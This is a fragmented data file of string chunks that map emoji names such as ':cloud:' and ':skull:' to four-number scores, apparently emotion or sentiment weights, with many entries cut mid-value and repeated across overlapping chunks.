0.245], \":up-down_arrow:\":", "\":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": 
[0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237,", "0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\":", "\":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297,", "0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266,", "0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191,", "0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161],", "[0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121,", "0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156],", "\":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196,", "0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237,", "0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\":", "0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225],", "[0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": 
[0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213,", "0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\":", "\":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113,", "0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\":", "[0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998,", "0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156],", "0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\":", "\":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247,", "[0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409,", "\":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998,", "0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138,", "0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\":", "\":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 
0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163,", "0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002,", "0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999],", "0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147,", "0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\":", "\":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073,", "\":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003,", "0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998,", "\":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997,", "[0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14,", "0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002],", "0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": 
[0.055999999999999994,", "\":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217,", "[0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998,", "\":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222,", "0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214,", "0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239,", "\":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172,", "0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\":", "\":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301,", "0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002,", "\":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999,", "0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141],", "0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122],", "0.38299999999999995], 
\":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228,", "\":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226,", "0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063,", "[0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086,", "0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225,", "0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\":", "\":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376,", "[0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182,", "0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\":", "\":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171,", "0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004,", "0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\":", "0.214, 
0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142],", "[0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21,", "\":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263,", "0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382,", "0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185,", "0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162,", "0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131],", "0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\":", "0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001],", "\":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161,", "[0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005,", "0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 
0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\":", "0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172],", "[0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146,", "[0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22,", "0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301,", "0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\":", "0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998,", "0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002,", "[0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233,", "0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\":", "\":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225,", "0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002],", "\":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 
0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18,", "0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158,", "\":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212,", "\":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154,", "\":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998,", "0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002,", "[0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133,", "0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034],", "0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\":", "0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085,", "\":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245,", "[0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11,", 
"\":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184,", "0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\":", "0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158,", "0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163,", "\":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001,", "[0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129,", "0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192],", "[0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002,", "0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135],", "0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997,", "\":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376,", "\":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35,", 
"\":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132,", "\":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445,", "0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\":", "0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\":", "0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\":", "0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113,", "0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09,", "0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228],", "0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\":", "\":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217,", "\":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001,", "0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262,", "[0.264, 
0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205,", "\":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214,", "0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998,", "[0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244,", "\":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225,", "0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267,", "\":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259,", "[0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218,", "0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228],", "0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002],", "[0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319,", "0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13,", 
"0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265],", "0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\":", "[0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631,", "\":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467,", "0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126,", "0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258,", "0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128,", "0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\":", "0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\":", "0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999,", "0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171],", "[0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], 
\":pensive_face:\": [0.261, 0.40399999999999997, 0.145,", "0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\":", "\":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226,", "0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081],", "\":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257, 0.264,", "\":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997,", "\":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133,", "\":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126,", "0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179,", "0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001],", "0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998,", "[0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141,", "0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 
